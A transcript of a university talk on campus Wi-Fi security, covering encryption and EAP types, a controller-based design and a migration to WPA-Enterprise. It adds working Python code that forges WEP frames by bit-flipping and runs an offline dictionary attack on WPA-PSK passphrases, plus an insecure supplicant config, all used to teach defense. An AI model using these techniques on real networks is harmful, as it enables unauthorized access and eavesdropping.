Emory Network Communications Wireless Security In an Education Environment Stan Brooks CWNA, CWSP Emory University Network Communications Division

Presentation transcript:

Slide 1: Title
Stan Brooks, CWNA, CWSP, Emory University Network Communications Division. IM (AIM / Yahoo! / MSN): WLANstan
Copyright Stan Brooks. This work is the intellectual property of the author. Permission is granted for this material to be shared for non-commercial, educational purposes, provided that this copyright statement appears on the reproduced materials and notice is given that the copying is by permission of the author. To disseminate otherwise or to republish requires written permission from the author.

Slide 2: Outline
What this presentation will not cover:
- Not a how-to hacking/cracking course
- Not a wireless basics discussion
- Not a deep dive on WLAN protocols
Wireless security:
- Why do we need security on wireless networks?
- Wireless security basics
- Wireless security history
- Choosing a wireless security model
- Implementing wireless security
- Migrating security models: a real-life story
- Protecting yourself: safe wireless computing at Wi-Fi hotspots and at home

Slide 3: Why Do We Need Security on WLANs?
- Easy to eavesdrop (sniff): the medium is shared and radiates beyond your walls
- Easy to spoof MAC addresses, so MAC filtering is not access control
- Easy to hack/crack pre-shared keys (WEP; WPA-PSK with a weak passphrase)
- Rogue APs
- Evil twin and man-in-the-middle (MitM) attacks
- The last 100 feet is the worst of all: much less secure than even wired Internet access
- The good news: wireless CAN be more secure than the wired network, if implemented properly
[Diagram: a real wireless user and a real access point on the internal network; an evil twin/MitM access point impersonating the AP; a rogue access point giving unauthorized access; an attacker sniffing the air (eavesdropping); the Internet]

Slide 4: Wireless Security: What Do We Protect?
There are three areas that need protection:
1) Protect data as it travels from source to destination
   - Eavesdropping (confidentiality)
   - Integrity (tampering)
   - Denial of service (DoS)
2) Protect the network from unauthorized/compromised users
   - Rogue APs
   - Stolen/hacked credentials
   - Client remediation (NAC/NAP/etc.)
3) Protect the client from unauthorized access
   - MitM/evil twin and ad hoc attacks
   - Attacks on open file (hard drive) shares
[Diagram: network, access point, wireless user]

Slide 5: Security PROCESS
- Security is a PROCESS
- Apply security in layers; there is NO single security silver bullet
- Different data require different levels of security: a term paper vs. student grades vs. financial aid data vs. health records
- Different users need different levels of access: student vs. faculty vs. guest users
- A business risk assessment helps to define requirements

Slide 6: Security Policy
- Wireless security SHOULD be part of your overall security policy (Acceptable Use Policy, Terms of Service: AUP/ToS)
- Policy should address the three areas to protect outlined on the previous slide
- Role-based access control:
  - All users are NOT created equal: student vs. faculty vs. staff vs. guest
  - All data are NOT created equal: term papers vs. grade reports vs. medical records
- Security policy also defines how the network is accessed:
  - Type of hardware and what level of support
  - Supported OSs
  - Access methods

Slide 7: AAA (or AAAA)
- Originated with dial-up Internet and VPN access
- RADIUS = Remote Authentication Dial-In User Service
- Authentication (username/password): who are you?
- Authorization (are you a valid user/subscriber?): are you allowed to log on to the network?
- Access control (added here for RBAC and wireless): where can you go once you are on the network? In RADIUS terms this is still authorization: the server returns attributes such as a VLAN or user role that the authenticator enforces.
- Accounting (originally the third A): logs, billing, tracking usage, and knowing who had which address when the RIAA or MPAA comes around

Slide 8: Authentication in a Wireless Environment
Types of wireless security models:
- Open system
- Shared key for encryption and authentication
  - Static key (WEP, WPA/WPA2-PSK)
  - Dynamic key (dynamic WEP, WPA/WPA2-Enterprise)
Authentication models:
- Open system
- VPN
- 802.1X (WPA/WPA2, or wired): needs a RADIUS server
- Guest access: captive portal, walled garden, other

Slide 9: Wi-Fi Security Evolution
[Chart: authentication methods on one axis (SSID, captive portal, VPN, 802.1X, 802.11i) against encryption on the other (WEP, dynamic WEP, TKIP, AES)]
- SSID only: easily hacked by children, no real security, just a no-trespassing sign
- Captive portal: requires a web server and may compromise the username/password (credentials cross an open network unless the portal is HTTPS, and nothing after login is encrypted)
- VPN: data encryption at the expense of wireless-layer authentication, and may require client software
- 802.1X: uses EAP (EAP-TLS, EAP-TTLS, PEAP, LEAP, etc.) and requires a RADIUS server. Dynamic WEP is fairly secure for its time; TKIP is much better, addressing the WEP issues known when it was designed. (TKIP was an interim fix for WEP-era hardware and has known attacks of its own today; prefer AES-CCMP.)
- 802.11i (also called WPA2): combines 802.1X authentication (EAP-TLS, EAP-TTLS, PEAP, LEAP, etc.) with AES encryption

Slide 10: WEP / WPA / WPA2 Basics

| | WEP | WPA-Personal | WPA-Enterprise | WPA2-Personal | WPA2-Enterprise |
|---|---|---|---|---|---|
| Encryption | RC4 with WEP: 24-bit IV, 40/104-bit key | RC4 with TKIP: 48-bit IV, 128-bit key | RC4 with TKIP: 48-bit IV, 128-bit key | AES-CCMP: 48-bit IV (packet number), 128-bit key | AES-CCMP: 48-bit IV (packet number), 128-bit key |
| Integrity | CRC-32 (unkeyed) | Michael, 64-bit key | Michael, 64-bit key | CBC-MAC, 128-bit key | CBC-MAC, 128-bit key |
| Authentication | Optional shared key | PSK (pre-shared key) | 802.1X, various EAP types | PSK (pre-shared key) | 802.1X, various EAP types |
| Ad hoc support | Yes | No | No | Yes | No |
| Standard | Part of the original 802.11 standard (1997; carried into 802.11b, 1999) | Snapshot of the 802.11i draft as of 10/2002 | Snapshot of the 802.11i draft as of 10/2002 | Specified in 802.11i, ratified 06/2004 | Specified in 802.11i, ratified 06/2004 |

Why the integrity row matters: WEP's ICV is a plain CRC-32 under a stream cipher, so anyone who can guess part of a frame's plaintext can flip bits and fix the checksum without knowing the key; Michael and CBC-MAC are keyed, so a forged frame fails the check. The 24-bit WEP IV also repeats after at most 2^24 frames (sooner with typical IV selection), which reuses RC4 keystream.
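The integrity weakness in the table, worked through as an added example (not code from the presentation): a textbook RC4 and a WEP-like frame body, an attacker who flips plaintext bits and repairs the CRC-32 ICV without the key, and the same edit rejected by a keyed MAC. HMAC-SHA256 stands in for CCMP's CBC-MAC, which the Python standard library does not provide; the key, IV and frame contents are constructed for the demo.

```python
"""WEP-style RC4 + CRC-32 "integrity" versus a keyed MAC.

Added example with constructed data: a textbook RC4, a WEP-like frame
body (IV || RC4_{IV||key}(plaintext || CRC-32 ICV)), and a bit-flip
that edits the plaintext and repairs the ICV without the key. CRC-32
is affine over XOR, and XOR commutes through a stream cipher, so the
receiver's ICV check passes. A keyed MAC (HMAC-SHA256 here, standing
in for CCMP's CBC-MAC, which is not in the standard library) rejects
the same edit. Key, IV and frame contents are made up for the demo.
"""
import binascii
import hashlib
import hmac


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling, then XOR the keystream over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, little-endian as in 802.11."""
    return (binascii.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as WEP builds it: cleartext IV, then RC4(plaintext || ICV)."""
    return iv + rc4(iv + key, plaintext + crc32(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok) as the receiver would compute them."""
    iv, body = frame[:3], frame[3:]
    clear = rc4(iv + key, body)
    plaintext, icv = clear[:-4], clear[-4:]
    return plaintext, icv == crc32(plaintext)


def wep_bitflip(frame: bytes, offset: int, delta: bytes) -> bytes:
    """Flip plaintext bits at `offset` and fix the ICV, knowing no key.

    For equal-length inputs, crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros).
    The attacker XORs d into the encrypted plaintext and the matching
    crc(d) ^ crc(zeros) into the encrypted ICV; the RC4 keystream is
    untouched, so the receiver decrypts p ^ d with a valid ICV.
    """
    iv, body = frame[:3], frame[3:]
    plen = len(body) - 4
    d = bytes(offset) + delta + bytes(plen - offset - len(delta))
    icv_delta = xor(crc32(d), crc32(bytes(plen)))
    return iv + xor(body, d + icv_delta)


def keyed_mac(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


MESSAGE = b"PAY TO: alice   AMOUNT: 100"     # constructed frame payload
EDIT = xor(b"alice", b"mallo")               # turns 'alice' into 'mallo'
EDIT_OFFSET = len(b"PAY TO: ")


def forge_wep_frame():
    """Attacker edits a sniffed WEP frame; returns what the receiver accepts."""
    key = b"\x01\x02\x03\x04\x05"            # constructed 40-bit WEP key
    frame = wep_encrypt(key, b"\x00\x00\x01", MESSAGE)
    forged = wep_bitflip(frame, EDIT_OFFSET, EDIT)
    return wep_decrypt(key, forged)          # (b'PAY TO: mallo   AMOUNT: 100', True)


def forge_mac_frame() -> bool:
    """Same edit against a keyed MAC; returns whether the receiver accepts it."""
    mac_key = b"\x42" * 32                   # constructed MAC key
    tag = keyed_mac(mac_key, MESSAGE)
    d = bytes(EDIT_OFFSET) + EDIT + bytes(len(MESSAGE) - EDIT_OFFSET - len(EDIT))
    return hmac.compare_digest(tag, keyed_mac(mac_key, xor(MESSAGE, d)))


if __name__ == "__main__":
    print(forge_wep_frame())
    print("keyed MAC accepts forgery:", forge_mac_frame())
```

The forgery needs only a sniffed frame and a guess at where the interesting bytes sit; TKIP's Michael and CCMP's CBC-MAC both key the integrity value, so the same XOR trick produces a frame the receiver discards.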

Slide 11: WPA / WPA2-Enterprise (802.1X) Elements
- Supplicant: the client
- Authentication server: the RADIUS server
- Authenticator: the AP or WLAN controller; passes the authentication transaction (EAP) between the supplicant and the authentication server without interpreting it
[Diagram: Supplicant (Client) <-> Authenticator (Access Point) <-> Authentication Server (RADIUS) <-> Network]
EAP rides over EAPOL on the air and inside RADIUS attributes on the wire; when the exchange succeeds, the authentication server hands the authenticator the keying material from which the per-session keys are derived.

Slide 12: WPA / WPA2-Enterprise EAP Types
(Columns of the original table: source, client support, server authentication, client authentication, vulnerability level, vulnerability examples.)
- EAP-MD5: open, NOT Wi-Fi Certified. Clients: Aegis, Odyssey. Server auth: none. Client auth: shared-key (MD5) challenge with NO key derivation, so it cannot produce WEP/WPA keys. Vulnerability: extremely high (offline dictionary attacks on the sniffed challenge/response).
- LEAP: Cisco proprietary, NOT Wi-Fi Certified. Clients: Cisco (CCX), Aegis, Odyssey. Server and client auth: MS-CHAP password hash. Vulnerability: high (ASLEAP: identity exposure and offline dictionary password attacks).
- EAP-FAST: Cisco proprietary, NOT Wi-Fi Certified. Clients: Odyssey. Server auth: PAC (shared key). Client auth: MSCHAPv2. Vulnerability: medium (PAC exposure).
- EAP-TLS: open, Wi-Fi Certified. Clients: Aegis, Odyssey. Server and client auth: certificate (PKI). Vulnerability: low (lost or stolen devices carrying the client certificate).
- EAP-TTLS (PAP, CHAP, MSCHAPv2, or GTC): open, Wi-Fi Certified. Clients: Aegis, Odyssey, T-Mobile Connection Manager (PCTEL). Server auth: certificate. Client auth: PAP, CHAP, MSCHAPv2, or GTC inside the tunnel. Vulnerability: medium (possible identity exposure, MitM risks).
- PEAPv0 (EAP-TLS or MSCHAPv2): Microsoft, Wi-Fi Certified. Clients: Microsoft WZC, Apple, Aegis, Odyssey. Server auth: certificate. Client auth: EAP-TLS (smart card) or MSCHAPv2 inside the tunnel. Vulnerability: medium (possible identity exposure, MitM risks).
- PEAPv1 (EAP-GTC): Cisco, Wi-Fi Certified. Clients: Cisco, Aegis, Odyssey. Server auth: certificate. Client auth: EAP-GTC (Generic Token Card). Vulnerability: medium (possible identity exposure, MitM risks).
- EAP-SIM: GSM wireless carriers, Wi-Fi Certified. Clients: Odyssey. Client auth: SIM smart card. Vulnerability: medium (GSM/GPRS attacks).
Note: Aegis client by Meetinghouse, Odyssey client by Funk/Juniper Networks.
The "medium" ratings for the tunneled methods (TTLS, PEAP) assume the supplicant validates the server certificate and the expected server name; a client configured to accept any certificate hands its inner credentials (an MSCHAPv2 exchange, or a cleartext PAP password) to an evil twin running its own RADIUS server. Identity exposure is avoided by setting an anonymous outer identity and sending the real username only inside the tunnel.
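What that caveat looks like in a supplicant, as an added example in wpa_supplicant.conf syntax (not from the presentation; the SSID is the one named on slide 16, while the server name, CA path, identities and password are placeholders). The first network block is the weak setting, the second the corrected one for PEAPv0/MSCHAPv2:

```conf
# Added example: WPA2-Enterprise PEAPv0/MSCHAPv2 in wpa_supplicant.conf.
# SSID from slide 16; server name, CA file, identity and password are placeholders.

# WEAK: no ca_cert, so the supplicant accepts ANY server certificate.
# An evil twin with its own RADIUS server terminates the TLS tunnel and
# collects the MSCHAPv2 challenge/response for offline cracking. The
# real username is also the outer identity, so it is visible in the clear.
network={
    ssid="EmoryUnplugged"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="placeholder-password"
    phase2="auth=MSCHAPV2"
}

# HARDENED: pin the issuing CA and the RADIUS server's name, require
# RSN/CCMP, and keep the real username inside the tunnel.
network={
    ssid="EmoryUnplugged"
    proto=RSN
    key_mgmt=WPA-EAP
    pairwise=CCMP
    eap=PEAP
    anonymous_identity="anonymous@example.edu"   # outer identity, sent in clear
    identity="jdoe"                              # inner identity, inside TLS
    password="placeholder-password"
    ca_cert="/etc/ssl/certs/campus-ca.pem"       # CA that issued the server cert
    domain_suffix_match="radius.example.edu"     # expected server name
    phase2="auth=MSCHAPV2"
}
```

domain_suffix_match is available in newer wpa_supplicant releases; older ones offer subject_match for the same purpose. The equivalent on Windows Wireless Zero Configuration is the "Validate server certificate" box together with "Connect to these servers" and the trusted root CA selection; leaving validation off reproduces the weak block above.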

Slide 13: Choosing the Right EAP Type
What EAP types does your client base support?
- Homogeneous or heterogeneous environment
- Machine or user authentication, or both?
- Do you control the clients?
- Do you support PKI?
- What clients are you willing to support, and at what level?
What EAP types does your authentication server support?
- RADIUS server supported EAP types
- RADIUS proxy capabilities to your back-end credential base
- Back-end directory/database capabilities: how are passwords stored? (MSCHAPv2 needs the NT hash or cleartext password on the server; a directory that stores only salted hashes rules it out, leaving PAP inside TTLS or a certificate method.)
- Proxy capabilities
- Back-end directory rights

Slide 14: Wireless Clients
PCs:
- Microsoft Windows XP WZC (Wireless Zero Configuration)
- Wireless chip manufacturers' clients: Atheros, Intel, Broadcom, Prism
- Open source: SecureW2, wEAP
- Funk/Juniper Odyssey
- Meetinghouse/Cisco Aegis
- VPN clients: Microsoft PPTP, IPSec; Checkpoint; others
Macs
Linux: wpa_supplicant, Xsupplicant
PDAs: native OS support, Funk/Juniper Odyssey, Meetinghouse/Cisco Aegis
Wi-Fi and dual-mode phones
Other devices: game consoles, TiVo, appliances (Nabaztag Wi-Fi rabbit)

Slide 15: Implementing a Secure Wireless Infrastructure
- Basic tenet: the wireless network should be considered UNTRUSTED
- Wireless traffic should be scrutinized and controlled just like Internet traffic, perhaps more so
- Difficult to build and scale an effective secure architecture with stand-alone APs:
  - Expanding VLANs across the campus
  - Backhauling wireless traffic to a firewall or wireless gateway
  - Managing APs, switches, and routers
- I'm an unabashed WLAN switch/controller proponent: much easier to implement security model(s); easier to deploy, manage, and troubleshoot

Slide 16: Aruba WLAN Switch/Controller-based Implementation
- The AP attaches to the network infrastructure and gets its configuration from the Aruba WLAN switch/controller
- The AP builds a tunnel to the Aruba WLAN switch/controller
- An authenticated user associates to the AP; all traffic is tunneled to the controller, where it is scrutinized and passed or blocked to various destinations including the Internet
- A guest user associates to the AP; all traffic is tunneled to the controller, scrutinized, and forwarded to the Internet as policy dictates
- Using a centralized controller gives a single point of ingress and control for wireless traffic on the wired network
[Diagram: thin access point; authenticated user on SSID EmoryUnplugged; guest user on SSID EmoryGuest; Aruba WLAN switch/controller with built-in firewall and per-user access control; Emory's internal network; Internet]

Slide 17: Migrating to New Security Models: Some History
- Emory originally settled on an open system/VPN authentication and access model in 2004
- As we grew, VPN was OK, but not great; the user experience with the VPN was sub-optimal
- Directive to move to WPA-Enterprise given Spring 2006
- Directive for completion by January 1, 2007

Slide 18: Changing Security Models
- Least impact on clients, but clients DO have to change
- Plan a transition period; longer (within reason) is better
- A natural calendar break is ideal for cut-over; Emory used Winter Break '06 as the cut-over
- Run both models for the transition period
- Market, market, market the change and why it's better

Slide 19: Poster Example
[Image: poster]

Slide 20: Poster/Ad Example
[Image: poster/ad]

Slide 21: Emory's Transition Timeline
- Fall 2005: started piloting the new model; developed configuration handouts and tools
- January 2006: started officially supporting the new model
- Spring Semester 2006 (Jan-May): marketed the change (posters, student newspaper ads); held clinics to get users transitioned; end-of-semester blast informing students of the impending change in Fall 2006
- Fall Semester 2006 (Sept-Dec): removed the old security model from ResNet areas; move-in weekend required lots of hands-on configuration help for students; held additional configuration clinics in high-use areas; mid- and late-semester blasts to known users of the old security model informing them of the model sunset
- Winter Break 2006: removed old security model access globally
- Result: no logged complaints

Slide 22: VPN Usage Graph, Oct 2005 to Feb 2007
[Graph: VPN usage over time, annotated with Thanksgiving 2005, Winter Break 2005, Spring Break 2006, Summer Break 2006, Move-in Weekend 2006, Thanksgiving 2006, and Winter Break 2006]

Slide 23: Wireless Security: Protecting Yourself
There are three main areas to address:
1) Protect data as it travels from source to destination
2) Protect the client from unauthorized access
3) Protect the network from unauthorized/compromised users
[Diagram: real wireless user, real access point, Internet]

Slide 24: Safe Hotspot Wireless Computing
- Assume the network connection is HOSTILE: practice safe computing!
- Enable/use personal firewalls, properly configured for an Internet or untrusted connection
- Configure your wireless client:
  - Do NOT connect to non-preferred wireless networks
  - Do NOT automatically connect to an open wireless network; set the client to ask you (on demand/manual)
  - No ad hoc networks (ad hoc networks are REALLY BAD)
- Encrypt your traffic:
  - WPA/WPA2-Enterprise (probably not available at hotspots)
  - VPNs: your organization's VPN (PPTP, IPSec, or SSL VPN), or public VPN gateways such as Hotspotvpn.com, Publicvpn.com, JiWire.com SpotLock. (PPTP's MS-CHAPv2 authentication has since been shown to be crackable offline; prefer IPsec or SSL VPNs.)
- Remember: HTTP, POP3, IMAP, FTP, Telnet, and other protocols send credentials and data as clear text, so encrypt to be safe!

Slide 25: Safe SOHO Wireless Computing
On your clients:
- Do NOT connect to non-preferred wireless networks
- No ad hoc networks (ad hoc networks are REALLY BAD)
On your router: please, please, please change your router's default configuration:
- CHANGE THE PASSWORD FROM THE DEFAULT
- Change the SSID from the default, and choose an SSID that does not identify you or your geographic location. (The SSID is also the salt in the WPA passphrase-to-key derivation, so a default SSID lets an attacker use precomputed tables of common passphrases.)
- Set the channel to 1, 6, or 11 (the non-overlapping 2.4 GHz channels) to reduce interference
- Read the directions and set up WPA-PSK or, preferably, WPA2-PSK (AES)
- Choose a difficult-to-guess and long (32+ character; the maximum is 63) passphrase with upper/lower case, numbers, and punctuation. Example: Emory\University/Rox*My smallW0RLD!!!Yeah!
- WPA-PSK is subject to dictionary attacks once an attacker has captured a client joining the network, so misspelled words, added punctuation, and longer keys help mitigate this type of attack; just make it easy for YOU to remember
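The two points above (the SSID as salt, and offline dictionary attacks on WPA-PSK) as an added example, not code from the presentation: the 802.11i passphrase-to-PSK mapping, a small cracker-style mangling rule set, and a guess loop run against a deliberately weak passphrase and against the slide's long one. The wordlist, SSIDs and weak passphrase are constructed; the handshake check a real attacker performs is replaced by comparing against the PSK derived in the script.

```python
"""WPA/WPA2-Personal: passphrase -> PSK, and why weak ones fall offline.

Added example with constructed data. Per IEEE 802.11i the 256-bit PSK is
PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations). Two consequences the
slide alludes to: the SSID is the salt, so a default SSID lets attackers
precompute PSKs for common passphrases; and once an attacker has sniffed
a 4-way handshake, every candidate passphrase can be tested offline. The
handshake check is not reproduced here; the "captured" value is the PSK
itself, derived in this script from a deliberately weak passphrase.
"""
import hashlib

SSID_DEFAULT = "linksys"                      # a factory-default SSID
WEAK_PASSPHRASE = "emory123"                  # constructed weak passphrase
STRONG_PASSPHRASE = r"Emory\University/Rox*My smallW0RLD!!!Yeah!"  # from the slide
WORDLIST = ["password", "emory", "wireless", "network", "letmein", "dragon"]


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """802.11i passphrase-to-PSK mapping (8..63 printable ASCII characters)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA passphrase must be printable ASCII")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def mangle(word: str):
    """A small rule set of the kind password crackers apply to each word."""
    seen = set()
    for cand in (word, word.capitalize(), word.upper(),
                 *(w + suffix for w in (word, word.capitalize())
                   for suffix in ("1", "123", "2007", "!")),
                 word.replace("o", "0").replace("e", "3").replace("a", "@")):
        if cand not in seen:
            seen.add(cand)
            yield cand


def dictionary_attack(target_psk: bytes, ssid: str, wordlist, max_guesses=10000):
    """Offline guessing: returns (passphrase or None, number of PSKs computed)."""
    guesses = 0
    for word in wordlist:
        for cand in mangle(word):
            if len(cand) < 8:                 # not a legal WPA passphrase
                continue
            guesses += 1
            if guesses > max_guesses:
                return None, guesses - 1
            if wpa_psk(cand, ssid) == target_psk:
                return cand, guesses
    return None, guesses


def demo():
    """Weak passphrase recovered from a short list; the slide's long one is not."""
    weak = dictionary_attack(wpa_psk(WEAK_PASSPHRASE, SSID_DEFAULT), SSID_DEFAULT, WORDLIST)
    strong = dictionary_attack(wpa_psk(STRONG_PASSPHRASE, SSID_DEFAULT), SSID_DEFAULT, WORDLIST)
    return weak[0], strong[0]


if __name__ == "__main__":
    print(wpa_psk("password", "IEEE").hex())   # 802.11i Annex test vector
    print(demo())
    # Same passphrase, different SSID: different PSK, so precomputed
    # tables only help against SSIDs the attacker chose to precompute.
    print(wpa_psk(WEAK_PASSPHRASE, "linksys") != wpa_psk(WEAK_PASSPHRASE, "NETGEAR"))
```

Each guess costs 4096 HMAC-SHA1 iterations, which slows a cracker but does not stop one; length and unpredictability of the passphrase, not the iteration count, are what keep the long passphrase out of reach of a wordlist.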

Slide 26: Recap
- Why we need security for wireless networks
- Different security models: strengths and weaknesses
- Implementation
- Migrating to a new security model
- Basic wireless security methods for home and hotspots

Slide 27: Questions & Discussion
Wireless Security In an Education Environment
Presentation Evaluation URL:

Slide 28: Bibliography & Resources
- CWNP (Certified Wireless Network Professional program): best program for learning ALL about WLANs
- Books: Real 802.11 Security; Wi-Foo; CWNA/CWSP/CWAP Study Guides; Hacking Wireless Networks for Dummies
- Websites: cwnp.com, wi-fiplanet.com, and others (hit the forums for good information)
- Manufacturers: Cisco, Aruba, Meru, Trapeze

